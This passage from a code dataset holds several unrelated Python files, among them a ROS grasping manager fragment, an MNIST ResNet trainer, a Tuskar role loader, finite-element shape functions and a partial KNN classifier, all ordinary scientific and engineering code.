block_pose_stamped.pose.position.z))\n\n        # Convert graspit grasp to moveit grasp\n        moveit_grasp_msg = self._graspit_grasp_to_moveit_grasp(goal.grasp)\n\n        # Execute pick on block\n        success, pick_result = self.grasping_controller.execute_moveit_grasp(goal.grasp.object_name, moveit_grasp_msg)\n        # pick_result: moveit_msgs.msg.PickupResult\n\n        if not success:\n            rospy.logerr(\"Failed to execute pick\")\n            self._execute_grasp_as.set_aborted(result)\n            return []\n        else:\n            rospy.loginfo(\"Successfully executed pick\")\n\n        # Execute place on block\n        success, place_result = self.grasping_controller.place(goal.grasp.object_name, pick_result, block_pose_stamped)\n\n        if not success:\n            rospy.logerr(\"Failed to execute place\")
Reason\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully executed place\")\n\n # Home arm and open hand\n success = self.grasping_controller.home_arm()\n if not success:\n rospy.logerr(\"Failed to home arm\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully homed arm\")\n\n success = self.grasping_controller.open_hand()\n if not success:\n rospy.logerr(\"Failed to open hand\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully opened hand\")\n\n result.success = True\n self._execute_grasp_as.set_succeeded(result)\n\n return []\n\n def _run_recognition_cb(self, goal):\n rospy.loginfo(\"Running recognition\")\n result = graspit_msgs.msg.RunObjectRecognitionResult()\n # type: result -> graspit_msgs.msg.RunObjectRecognitionResult\n\n self.world_manager_client.clear_objects()\n\n detected_blocks = self.block_recognition_client.find_blocks()\n # type: detected_blocks -> typing.List[block_recognition.msg.DetectedBlock]\n\n if len(detected_blocks) == 0:\n rospy.loginfo(\"Detected no blocks. No work done. \")\n self._run_recognition_as.set_succeeded(result)\n return []\n\n rospy.loginfo(\"Detected {} blocks\".format(len(detected_blocks)))\n\n for detected_block in detected_blocks:\n # Add all blocks to the scene\n self.world_manager_client.add_box(detected_block.unique_block_name,\n detected_block.pose_stamped,\n detected_block.edge_length,\n detected_block.edge_length,\n detected_block.edge_length)\n\n self.tf_listener.waitForTransform(self.world_frame, detected_block.unique_block_name, rospy.Time(0), rospy.Duration(10))\n detected_block_world_pose = pm.toMsg(pm.fromTf(self.tf_listener.lookupTransform(self.world_frame, detected_block.unique_block_name, rospy.Time(0))))\n\n # Add blocks to graspit result\n object_info = graspit_msgs.msg.ObjectInfo(\n detected_block.unique_block_name,\n detected_block.mesh_filename,\n detected_block_world_pose\n )\n result.object_info.append(object_info)\n\n rospy.loginfo(\"Finished recognition\")\n self._run_recognition_as.set_succeeded(result)\n return []\n\n\ndef main():\n try:\n crui_manager = CRUIManager()\n loop = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n loop.sleep()\n moveit_commander.roscpp_shutdown()\n except rospy.ROSInterruptException:\n rospy.signal_shutdown(reason=\"Interrupted\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/crui_manager.py","file_name":"crui_manager.py","file_ext":"py","file_size_in_byte":12941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"427098530","text":"import argparse\nimport json\nimport os\nimport os.path as osp\nimport sys\nimport time\nimport torch\nfrom torch.utils.data import DataLoader\n\n\n\nfrom model import resnet\nfrom model import utils\nfrom model import image_folder\n\n\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_root', type=str, default='../data', help='root directory')\n parser.add_argument('--data_dir', type=str, default='AZSL-D', help='data directory')\n parser.add_argument('--dataset', type=str, default='ImNet_A', help='ImNet_A, AwA')\n parser.add_argument('--gpu', default='0')\n parser.add_argument('--consider-trains', action='store_true')\n parser.add_argument('--no-pred', action='store_true')\n parser.add_argument('--pred', type= str, default='', help='the predicted classifier name')\n\n\n args = parser.parse_args()\n\n 
    DATA_DIR = os.path.join(args.data_root, args.data_dir)\n    DATASET = args.dataset\n    EXP_NAME = 'Exp1_DGP'\n\n    # the directory of testing data features\n    test_feat = os.path.join(DATA_DIR, DATASET, 'Test_DATA_feats')\n\n    if DATASET == 'ImNet_A':\n        data_split = os.path.join(DATA_DIR, DATASET, 'seen-unseen-split.json')\n    elif DATASET == 'AwA':\n        data_split = os.path.join(DATA_DIR, DATASET, 'awa2-split.json')\n\n    # predicted classifiers (awa: epoch 300); use the selected dataset's directory\n    pred_file = os.path.join(DATA_DIR, DATASET, EXP_NAME, 'epoch-' + args.pred + '.pred')\n\n    # set_gpu(args.gpu)\n    '''\n    seen-unseen-split.json:\n    split[train], split[test]\n    '''\n\n    split = json.load(open(data_split, 'r'))\n    train_wnids = split['train']\n    test_wnids = split['test']\n\n\n    print('train: {}, test: {}'.format(len(train_wnids), len(test_wnids)))\n    print('consider train classifiers: {}'.format(args.consider_trains))\n\n\n    preds = torch.load(pred_file)\n    pred_wnids = preds['wnids']\n    pred_vectors = preds['pred']  # (3969, 2049)\n\n    pred_dic = dict(zip(pred_wnids, pred_vectors))  # map each wnid to its classifier vector\n    # select seen and unseen pred_vectors\n    pred_vectors = utils.pick_vectors(pred_dic, train_wnids + test_wnids, is_tensor=True)\n\n    n = len(train_wnids)\n    m = len(test_wnids)\n\n\n    # test_names = awa2_split['test_names']\n\n    ave_acc = 0\n    ave_acc_n = 0\n\n    results = {}\n\n\n\n    # total_hits, total_imgs = 0, 0\n    total_hits = torch.FloatTensor([0, 0, 0, 0, 0])  # top 1 2 5 10 20\n    total_imgs = 0\n    for i, wnid in enumerate(test_wnids, 1):\n        all_label = n + i - 1\n        # hit = 0\n        # tot = 0\n        top = [1, 2, 5, 10, 20]\n        hits = torch.zeros(len(top))\n        tot = 0\n\n\n        # load test features begin\n        cls_path = osp.join(test_feat, wnid)\n        paths = os.listdir(cls_path)\n        feat_data = list()\n        for path in paths:\n            feat = torch.load(osp.join(cls_path, path))\n            feat = torch.squeeze(feat)\n\n            feat_data.append(feat)\n\n        # test 100\n        # if len(feat_data) > 100:\n        #     feat_data = feat_data[:100]\n\n        feat_data = torch.stack(feat_data, dim=0)\n        # print 'feat_data shape:', feat_data.shape\n        # load test features end\n\n\n        feat = torch.cat([feat_data, torch.ones(len(feat_data)).view(-1, 1)], dim=1)\n\n        fcs = pred_vectors.t()  # [2049, 50]\n\n        table = torch.matmul(feat, fcs)\n        # False: filter out seen classifiers\n        if not args.consider_trains:\n            table[:, :n] = -1e18\n\n        # compute hit@k from the rank of the ground-truth score\n        gth_score = table[:, all_label].repeat(table.shape[1], 1).t()\n        rks = (table >= gth_score).sum(dim=1)\n        assert (table[:, all_label] == gth_score[:, all_label]).min() == 1\n        for j, k in enumerate(top):\n            hits[j] += (rks <= k).sum().item()\n        tot += len(feat_data)\n\n        total_hits += hits\n        total_imgs += tot\n\n        # print('{}/{}, {}, total: {} : '.format(i, len(test_wnids), wnid, tot))\n        # # hits = float(hits) / float(tot)\n        # hits = [float(hit) / float(tot) for hit in hits]\n        # output = ['{:.2f}'.format(i * 100) for i in hits]\n        # print('results: ', output)\n\n    print('total images: ', total_imgs)\n    # total_hits = float(total_hits) / float(total_imgs)\n    total_hits = [float(hit) / float(total_imgs) for hit in total_hits]\n    output = ['{:.2f}'.format(i * 100) for i in total_hits]\n    print('results: ', output)\n\n\n","sub_path":"AZSL-D/test_dgp.py","file_name":"test_dgp.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
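A quick standalone sketch of the rank trick used in the hit@k loop above (synthetic scores, illustrative only — not part of the repo):

    import torch

    scores = torch.tensor([[0.1, 0.9, 0.3],
                           [0.8, 0.2, 0.5]])   # (num_images, num_classes)
    gt = 1                                     # index of the true class
    gth = scores[:, gt].repeat(scores.shape[1], 1).t()
    ranks = (scores >= gth).sum(dim=1)         # rank of the true class per image
    print((ranks <= 2).sum().item())           # prints 1: only the first image has the true class in its top-2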
 +{"seq_id":"349679728","text":"# Collaborators (including web sites where you got help): enter none if you didn't need help\n#\n\ndef avg_temp():\n    with open('temps.txt') as file_object:\n        line_list = file_object.readlines()\n    list_length = len(line_list)\n    sum_list = 0\n    for i in range(1, list_length):\n        line_list[i] = line_list[i].rstrip()\n        sum_list = float(line_list[i]) + sum_list\n        print(line_list[i])\n    print(sum_list)\n    average_list = sum_list / (list_length - 1)\n    average_list = round(average_list, 2)\n\n    return average_list\n\n\nif __name__ == '__main__':\n    print(avg_temp())\n\n    \n","sub_path":"my_code.py","file_name":"my_code.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"503814416","text":"# Exercise 04-09\n'''\nStudent Name: Charlie\nID: 201810101580044\nClass: Network 182\n'''\nmessage = str(input('please enter a word or sentence:'))\nfor i in message:\n    if i == 'x':\n        print('This has the letter \'x\' in it')\n        break\nelse:\n    print('This does not have the letter \'x\' in it')\n","sub_path":"Python_OOP/Exercise/Exercise 04/201810701580044 - Charlie/excise04-09.py","file_name":"excise04-09.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
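The for/else in the exercise above is correct, but the same check is a one-line membership test; a minimal equivalent sketch:

    message = str(input('please enter a word or sentence:'))
    if 'x' in message:
        print("This has the letter 'x' in it")
    else:
        print("This does not have the letter 'x' in it")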
 +{"seq_id":"650287890","text":"\n# author: Hurricane\n# date: 2020/11/4\n# E-mail: hurri_cane@qq.com\n\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nimport random\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nimport time\nfrom tqdm import tqdm\n\n# training set image file\ntrain_images_idx3_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/train-images.idx3-ubyte'\n# training set label file\ntrain_labels_idx1_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/train-labels.idx1-ubyte'\n\n# test set image file\ntest_images_idx3_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/t10k-images.idx3-ubyte'\n# test set label file\ntest_labels_idx1_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/t10k-labels.idx1-ubyte'\n\n\n# data loading section\ndef decode_idx3_ubyte(idx3_ubyte_file):\n    bin_data = open(idx3_ubyte_file, 'rb').read()\n\n    offset = 0\n    fmt_header = '>iiii'  # the first 4 header fields are 32-bit integers, so the format is 'i' and we read all 4 at once; the label files, seen later, need only '>ii'.\n    magic_number, num_images, num_rows, num_cols = struct.unpack_from(fmt_header, bin_data, offset)\n    print('number of images: %d, image size: %d*%d' % (num_images, num_rows, num_cols))\n\n    # parse the data set\n    image_size = num_rows * num_cols\n    offset += struct.calcsize(fmt_header)  # advance the buffer pointer past the header; after the 4 header fields it points at offset 0x0010.\n    print(offset)\n    fmt_image = '>' + str(\n        image_size) + 'B'  # pixel values are unsigned char, format 'B'; prefixing the image size (784) reads 784 'B' values at once -- without it only a single pixel value would be read.\n    print(fmt_image, offset, struct.calcsize(fmt_image))\n    images = np.empty((num_images, 28, 28))\n    # plt.figure()\n    for i in tqdm(range(num_images)):\n        image = np.array(struct.unpack_from(fmt_image, bin_data, offset)).reshape((num_rows, num_cols)).astype(np.uint8)\n        # images[i] = cv.resize(image, (96, 96))\n        images[i] = image\n        # print(images[i])\n        offset += struct.calcsize(fmt_image)\n\n    return images\n\n\ndef decode_idx1_ubyte(idx1_ubyte_file):\n    bin_data = open(idx1_ubyte_file, 'rb').read()\n    offset = 0\n    fmt_header = '>ii'\n    magic_number, num_images = struct.unpack_from(fmt_header, bin_data, offset)\n    print('number of labels: %d' % (num_images))\n\n    # parse the data set\n    offset += struct.calcsize(fmt_header)\n    fmt_image = '>B'\n    labels = np.empty(num_images)\n    for i in tqdm(range(num_images)):\n        labels[i] = struct.unpack_from(fmt_image, bin_data, offset)[0]\n        offset += struct.calcsize(fmt_image)\n    return labels\n\n\ndef load_train_images(idx_ubyte_file=train_images_idx3_ubyte_file):\n    return decode_idx3_ubyte(idx_ubyte_file)\n\n\ndef load_train_labels(idx_ubyte_file=train_labels_idx1_ubyte_file):\n    return decode_idx1_ubyte(idx_ubyte_file)\n\n\ndef load_test_images(idx_ubyte_file=test_images_idx3_ubyte_file):\n    return decode_idx3_ubyte(idx_ubyte_file)\n\n\ndef load_test_labels(idx_ubyte_file=test_labels_idx1_ubyte_file):\n    return decode_idx1_ubyte(idx_ubyte_file)\n\n\n# network construction section\nclass Residual(nn.Module):  # this class is also provided in the d2lzh_pytorch package for later reuse\n    def __init__(self, in_channels, out_channels, use_1x1conv=False, stride=1):\n        super(Residual, self).__init__()\n        self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=stride)\n        self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1)\n        if use_1x1conv:\n            self.conv3 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride)\n        else:\n            self.conv3 = None\n        self.bn1 = nn.BatchNorm2d(out_channels)\n        self.bn2 = nn.BatchNorm2d(out_channels)\n\n    def forward(self, X):\n        Y = F.relu(self.bn1(self.conv1(X)))\n        Y = self.bn2(self.conv2(Y))\n        if self.conv3:\n            X = self.conv3(X)\n        return F.relu(Y + X)\n\n\nclass GlobalAvgPool2d(nn.Module):\n    # global average pooling: implemented by setting the pooling window to the input's height and width\n    def __init__(self):\n        super(GlobalAvgPool2d, self).__init__()\n\n    def forward(self, x):\n        return F.avg_pool2d(x, kernel_size=x.size()[2:])\n\n\ndef resnet_block(in_channels, out_channels, num_residuals, first_block=False):\n    # num_residuals: number of residual units in the block\n    if first_block:\n        assert in_channels == out_channels  # the first block keeps the channel count of its input\n    blk = []\n    for i in range(num_residuals):\n        if i == 0 and not first_block:\n            blk.append(Residual(in_channels, out_channels, use_1x1conv=True, stride=2))\n        else:\n            blk.append(Residual(out_channels, out_channels))\n    return nn.Sequential(*blk)\n\n\ndef evaluate_accuracy(img, label, net):\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n    acc_sum, n = 0.0, 0\n    with torch.no_grad():\n        X = torch.unsqueeze(img, 1)\n        if isinstance(net, torch.nn.Module):\n            net.eval()  # evaluation mode; this disables dropout\n            acc_sum += (net(X.to(device)).argmax(dim=1) == label.to(device)).float().sum().cpu().item()\n            net.train()  # switch back to training mode\n        else:  # custom model (not used after section 3.13); no GPU handling\n            if ('is_training' in net.__code__.co_varnames):  # if the function takes an is_training argument\n                # call it with is_training=False\n                acc_sum += (net(X, is_training=False).argmax(dim=1) == label).float().sum().item()\n            else:\n                acc_sum += (net(X).argmax(dim=1) == label).float().sum().item()\n        n += label.shape[0]\n    return acc_sum / n\n\nclass FlattenLayer(torch.nn.Module):\n    def __init__(self):\n        super(FlattenLayer, self).__init__()\n    def forward(self, x):  # x shape: (batch, *, *, ...)\n        return x.view(x.shape[0], -1)\n\nif __name__ == '__main__':\n    print(\"train:\")\n    train_images_org = load_train_images().astype(np.float32)\n    train_labels_org = load_train_labels().astype(np.int64)\n    print(\"test\")\n    test_images = load_test_images().astype(np.float32)[0:1000]\n    test_labels = load_test_labels().astype(np.int64)[0:1000]\n    # convert the data to tensors\n    train_images = torch.from_numpy(train_images_org)\n    train_labels = torch.from_numpy(train_labels_org)\n    test_images = torch.from_numpy(test_images)\n    test_labels = torch.from_numpy(test_labels)\n    # test_images = load_test_images()\n    # test_labels = load_test_labels()\n\n    # show a few random samples and their labels to verify the data was read correctly\n    for i in range(5):\n        j = random.randint(0, 60000)\n        print(\"now, show the number of image[{}]:\".format(j), int(train_labels_org[j]))\n        img = train_images_org[j]\n        img = cv.resize(img, (600, 600))\n        
cv.imshow(\"image\", img)\n cv.waitKey(0)\n cv.destroyAllWindows()\n print('all done!')\n print(\"*\" * 50)\n\n # ResNet模型\n net = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1))\n\n net.add_module(\"resnet_block1\", resnet_block(64, 64, 2, first_block=True))\n net.add_module(\"resnet_block2\", resnet_block(64, 128, 2))\n net.add_module(\"resnet_block3\", resnet_block(128, 256, 2))\n\n net.add_module(\"global_avg_pool\", GlobalAvgPool2d()) # GlobalAvgPool2d的输出: (Batch, 512, 1, 1)\n net.add_module(\"fc\", nn.Sequential(FlattenLayer(), nn.Linear(256, 10)))\n\n # 测试网络\n X = torch.rand((1, 1, 28, 28))\n for name, layer in net.named_children():\n X = layer(X)\n print(name, ' output shape:/t', X.shape)\n\n # 训练\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n lr, num_epochs = 0.001, 100\n optimizer = torch.optim.Adam(net.parameters(), lr=lr)\n batch_size = 1000\n net = net.to(device)\n\n print(\"training on \", device)\n loss = torch.nn.CrossEntropyLoss()\n loop_times = round(60000 / batch_size)\n train_acc_plot = []\n test_acc_plot = []\n loss_plot = []\n for epoch in range(num_epochs):\n train_l_sum, train_acc_sum, n, batch_count, start = 0.0, 0.0, 0, 0, time.time()\n\n for i in tqdm(range(1, loop_times)):\n x = train_images[(i - 1) * batch_size:i * batch_size]\n y = train_labels[(i - 1) * batch_size:i * batch_size]\n x = torch.unsqueeze(x, 1) # 对齐维度\n X = x.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_l_sum += l.cpu().item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()\n n += y.shape[0]\n batch_count += 1\n test_acc = evaluate_accuracy(test_images, test_labels, net)\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'\n % (epoch + 1, train_l_sum / batch_count, train_acc_sum / n, test_acc, time.time() - start))\n torch.save(net.state_dict(), 'logs/Epoch%d-Loss%.4f-train_acc%.4f-test_acc%.4f.pth' % (\n (epoch + 1), train_l_sum / batch_count, train_acc_sum / n, test_acc))\n print(\"save successfully\")\n\n test_acc_plot.append(test_acc)\n train_acc_plot.append(train_acc_sum / n)\n loss_plot.append(train_l_sum / batch_count)\n\n x = range(0,100)\n plt.plot(x,test_acc_plot,'r')\n plt.plot(x, train_acc_plot, 'g')\n plt.plot(x, loss_plot, 'b')\n print(\"*\" * 50)\n","sub_path":"hand_wrtten_train.py","file_name":"hand_wrtten_train.py","file_ext":"py","file_size_in_byte":9787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"428549857","text":"#!/usr/bin/env python\n#\n# Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nfrom os import path\n\nfrom tuskar.storage.exceptions import UnknownName\nfrom tuskar.storage.stores import MasterSeedStore\nfrom tuskar.storage.stores import ResourceRegistryStore\nfrom tuskar.storage.stores import TemplateStore\n\n\nMASTER_SEED_NAME = '_master_seed'\nRESOURCE_REGISTRY_NAME = '_registry'\n\n\ndef _load_file(role_path):\n\n    with open(role_path) as role_file:\n        return role_file.read()\n\n\ndef _create_or_update(name, contents, store=None):\n\n    if store is None:\n        store = TemplateStore()\n\n    try:\n        role = store.retrieve_by_name(name)\n\n        if role.contents != contents:\n            role = store.update(role.uuid, contents)\n\n        return False, role\n    except UnknownName:\n        return True, store.create(name, contents)\n\n\ndef role_name_from_path(role_path):\n    return path.splitext(path.basename(role_path))[0]\n\n\ndef load_roles(roles, seed_file=None, resource_registry_path=None,\n               dry_run=False):\n    \"\"\"Given a list of role files, import them into the TemplateStore. When\n    dry_run=True is passed, run through the roles but don't add any to the\n    store.\n\n    The returned tuple contains all the role names and then the names split\n    by whether they were created or updated. On a dry run the first item will\n    contain all of the roles found while the second two will be empty lists as\n    no files were updated or created.\n\n    :param roles: A list of yaml files (as strings)\n    :type  roles: [str]\n\n    :param seed_file: full path to the template seed that should be used for\n        plan master templates\n    :type  seed_file: str\n\n    :param resource_registry_path: path to the Heat environment which\n        declares the custom types for Tuskar roles.\n    :type  resource_registry_path: str\n\n    :return: Summary of the results as a tuple with all the role names and\n        then the names of the created and updated roles.\n    :rtype:  tuple(list, list, list)\n    \"\"\"\n\n    all_roles, created, updated = [], [], []\n\n    roles = [(role_name_from_path(r), r) for r in roles]\n\n    for name, role_path in roles:\n\n        contents = _load_file(role_path)\n        all_roles.append(name)\n\n        if dry_run:\n            continue\n\n        role_created, _ = _create_or_update(name, contents)\n\n        if role_created:\n            created.append(name)\n        else:\n            updated.append(name)\n\n    if seed_file is not None:\n        contents = _load_file(seed_file)\n        seed_created, role = _create_or_update(MASTER_SEED_NAME, contents,\n                                               store=MasterSeedStore())\n        all_roles.append(MASTER_SEED_NAME)\n\n        if seed_created:\n            created.append(MASTER_SEED_NAME)\n        else:\n            updated.append(MASTER_SEED_NAME)\n\n    if resource_registry_path is not None:\n        contents = _load_file(resource_registry_path)\n        store = ResourceRegistryStore()\n        registry_created, role = _create_or_update(RESOURCE_REGISTRY_NAME,\n                                                   contents,\n                                                   store=store)\n        all_roles.append(RESOURCE_REGISTRY_NAME)\n        if registry_created:\n            created.append(RESOURCE_REGISTRY_NAME)\n        else:\n            updated.append(RESOURCE_REGISTRY_NAME)\n\n    return all_roles, created, updated\n","sub_path":"tuskar/storage/load_roles.py","file_name":"load_roles.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
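A minimal usage sketch for load_roles above (the file names are hypothetical):

    all_roles, created, updated = load_roles(
        ['roles/compute.yaml', 'roles/controller.yaml'], dry_run=True)
    print(all_roles)           # ['compute', 'controller']
    print(created, updated)    # both empty: a dry run creates and updates nothing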
 +{"seq_id":"243239137","text":"import numpy as np\r\n\r\n\r\nclass ShapeFunction:\r\n    \"\"\"Class which contains functions to calculate the N matrix and the B matrix\r\n    Inputs:\r\n    1) (self.xi, self.eta) = natural coordinates\r\n    2) vertex_coord = coordinates of the vertex points\r\n    3) el_type = type of element used in meshing\r\n       el_type = 0 (4 noded quadrilateral)\r\n       el_type = 1 (8 noded quadrilateral)\"\"\"\r\n\r\n    def __init__(self, xi, eta, el_type):\r\n        self.xi = xi\r\n        self.eta = eta\r\n        self.el_type = el_type\r\n        if self.el_type == 0:\r\n            self.N = np.zeros((2, 8))\r\n        elif self.el_type == 1:\r\n            self.N = np.zeros((2, 16))\r\n        self.J = np.zeros((2, 2))\r\n        if self.el_type == 0:\r\n            self.dpN = np.zeros((2, 4))\r\n        elif self.el_type == 1:\r\n            self.dpN = np.zeros((2, 8))\r\n\r\n    def get_N_matrix(self):\r\n        \"\"\"Calculate the N matrix\"\"\"\r\n\r\n        if self.el_type == 0:\r\n            # shape functions for 4 noded quadrilateral\r\n            N1 = (1 - self.xi) * (1 - self.eta) / 4\r\n            N2 = (1 + self.xi) * (1 - self.eta) / 4\r\n            N3 = (1 + self.xi) * (1 + self.eta) / 4\r\n            N4 = (1 - self.xi) * (1 + self.eta) / 4\r\n\r\n            self.N[0, ::2] = np.array([N1, N2, N3, N4])\r\n            self.N[1, 1::2] = np.array([N1, N2, N3, N4])\r\n            return self.N\r\n\r\n        elif self.el_type == 1:\r\n            # shape functions for 8 noded quadrilateral element\r\n            N1 = -(1 - self.xi) * (1 - self.eta) * (1 + self.xi + self.eta) / 4\r\n            N2 = (1 + self.xi) * (1 - self.eta) * (-1 + self.xi - self.eta) / 4\r\n            N3 = (1 + self.xi) * (1 + self.eta) * (-1 + self.xi + self.eta) / 4\r\n            N4 = (1 - self.xi) * (1 + self.eta) * (-1 - self.xi + self.eta) / 4\r\n            N5 = (1 - self.xi ** 2) * (1 - self.eta) / 2\r\n            N6 = (1 + self.xi) * (1 - self.eta ** 2) / 2\r\n            N7 = (1 - self.xi ** 2) * (1 + self.eta) / 2\r\n            N8 = (1 - self.xi) * (1 - self.eta ** 2) / 2\r\n\r\n            self.N[0, ::2] = np.array([N1, N2, N3, N4, N5, N6, N7, N8])\r\n            self.N[1, 1::2] = np.array([N1, N2, N3, N4, N5, N6, N7, N8])\r\n            return self.N\r\n\r\n    def compute_Jacobian(self, vertex_coord):\r\n        \"\"\"Calculate the Jacobian matrix for 4 noded and 8 noded quadrilateral elements\"\"\"\r\n\r\n        # dpN = gradient of shape functions wrt natural coordinates (xi, eta)\r\n\r\n        if self.el_type == 0:\r\n            self.dpN[0, 0] = -(1 - self.eta) / 4\r\n            self.dpN[1, 0] = -(1 - self.xi) / 4\r\n            self.dpN[0, 1] = (1 - self.eta) / 4\r\n            self.dpN[1, 1] = -(1 + self.xi) / 4\r\n            self.dpN[0, 2] = (1 + self.eta) / 4\r\n            self.dpN[1, 2] = (1 + self.xi) / 4\r\n            self.dpN[0, 3] = -(1 + self.eta) / 4\r\n            self.dpN[1, 3] = (1 - self.xi) / 4\r\n\r\n        elif self.el_type == 1:\r\n            self.dpN[0, 0] = -(1 - self.eta) * (-2 * self.xi - self.eta) / 4\r\n            self.dpN[1, 0] = -(1 - self.xi) * (-self.xi - 2 * self.eta) / 4\r\n            self.dpN[0, 1] = (1 - self.eta) * (2 * self.xi - self.eta) / 4\r\n            self.dpN[1, 1] = (1 + self.xi) * (-self.xi + 2 * self.eta) / 4\r\n            self.dpN[0, 2] = (1 + self.eta) * (2 * self.xi + self.eta) / 4\r\n            self.dpN[1, 2] = (1 + self.xi) * (self.xi + 2 * self.eta) / 4\r\n            self.dpN[0, 3] = (1 + self.eta) * (2 * self.xi - self.eta) / 4\r\n            self.dpN[1, 3] = (1 - self.xi) * (-self.xi + 2 * self.eta) / 4\r\n            self.dpN[0, 4] = -2 * self.xi * (1 - self.eta) / 2\r\n            self.dpN[1, 4] = (-1 + self.xi ** 2) / 2\r\n            self.dpN[0, 5] = (1 - self.eta ** 2) / 2\r\n            self.dpN[1, 5] = -2 * self.eta * (1 + self.xi) / 2\r\n            self.dpN[0, 6] = -2 * self.xi * (1 + self.eta) / 2\r\n            self.dpN[1, 6] = (1 - self.xi ** 2) / 2\r\n            self.dpN[0, 7] = -(1 - self.eta ** 2) / 2\r\n            self.dpN[1, 7] = (1 - self.xi) * (-2 * self.eta) / 2\r\n\r\n        self.J = np.dot(self.dpN, vertex_coord)\r\n\r\n    def get_B_matrix(self):\r\n        \"\"\"Calculates the strain-displacement matrix (B)\"\"\"\r\n\r\n        # dN = spatial gradient of shape functions\r\n        dN = np.dot(np.linalg.inv(self.J), self.dpN)\r\n        B = np.zeros((3, 2 * self.dpN.shape[1]))\r\n\r\n        B[0, ::2] = dN[0, :]\r\n        B[1, 1::2] = dN[1, :]\r\n        B[2, ::2] = dN[1, :]\r\n        B[2, 1::2] = dN[0, :]\r\n\r\n
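        # For reference, B has the standard 2-D (3 x 2n) layout:\r\n        #     [ dN1/dx    0      dN2/dx    0     ... ]\r\n        # B = [   0     dN1/dy     0     dN2/dy  ... ]\r\n        #     [ dN1/dy  dN1/dx   dN2/dy  dN2/dx  ... ]\r\n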
        return B\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"shape_function.py","file_name":"shape_function.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"193978611","text":"from sklearn.neighbors import NearestNeighbors\nfrom math import ceil\nimport numpy as np\nimport distances as dist\n\n\nclass KNNClassifier:\n\n    def __init__(self, k, strategy, metric, weights, test_block_size):\n        self.k = k\n        self.strategy = strategy\n        self.metric = metric\n        self.weights = weights\n        self.test_block_size = test_block_size\n        self.eps = 10 ** (-5)\n\n    def fit(self, X, y):\n        self.y = y.astype(int)\n        if self.strategy == 'my_own':\n            self.X = X\n        else:\n            self.knn = NearestNeighbors(n_neighbors=self.k,\n                                        algorithm=self.strategy,\n                                        metric=self.metric\n                                        )\n            self.knn.fit(X, y)\n\n    def find_kneighbors(self, X, return_distance):\n        block_num = ceil(X.shape[0] / self.test_block_size)\n        if return_distance:\n            distances = np.zeros((X.shape[0], self.k))\n        indices = np.zeros((X.shape[0], self.k))\n        for i in range(0, block_num):\n            begin = i * self.test_block_size\n            end = (i + 1) * self.test_block_size\n            X_block = X[begin:end, :]\n            block_ind = None\n            block_dist = None\n            if self.strategy == 'my_own':\n                if self.metric == 'euclidean':\n                    block_dist = dist.euclidean_distance(X_block, self.X)\n                else:\n                    block_dist = dist.cosine_distance(X_block, self.X)\n                block_ind = np.argsort(block_dist)[:, 0:self.k]\n                if return_distance:\n                    block_dist = np.sort(np.partition(block_dist,\n                                                      self.k - 1)[:, 0:self.k])\n            else:\n                if return_distance:\n                    block_dist, block_ind = (self.knn.kneighbors(X=X_block,\n                                                                 return_distance=return_distance))\n                else:\n                    block_ind = (self.knn.kneighbors(X=X_block,\n                                                     return_distance=return_distance))\n            indices[begin:end, :] = block_ind\n            if return_distance:\n                distances[begin:end, :] = block_dist\n        if return_distance:\n            return distances, indices.astype(int)\n        else:\n            return indices.astype(int)\n\n    def predict(self, X):\n        if self.weights:\n            distances, indices = self.find_kneighbors(X, True)\n            weights = 1 / (distances + self.eps)\n        else:\n            indices = self.find_kneighbors(X, False)\n        res = self.y[indices]\n        predict = np.zeros(X.shape[0])\n        for i in range(0, res.shape[0]):\n            count = None\n            if self.weights:\n                count 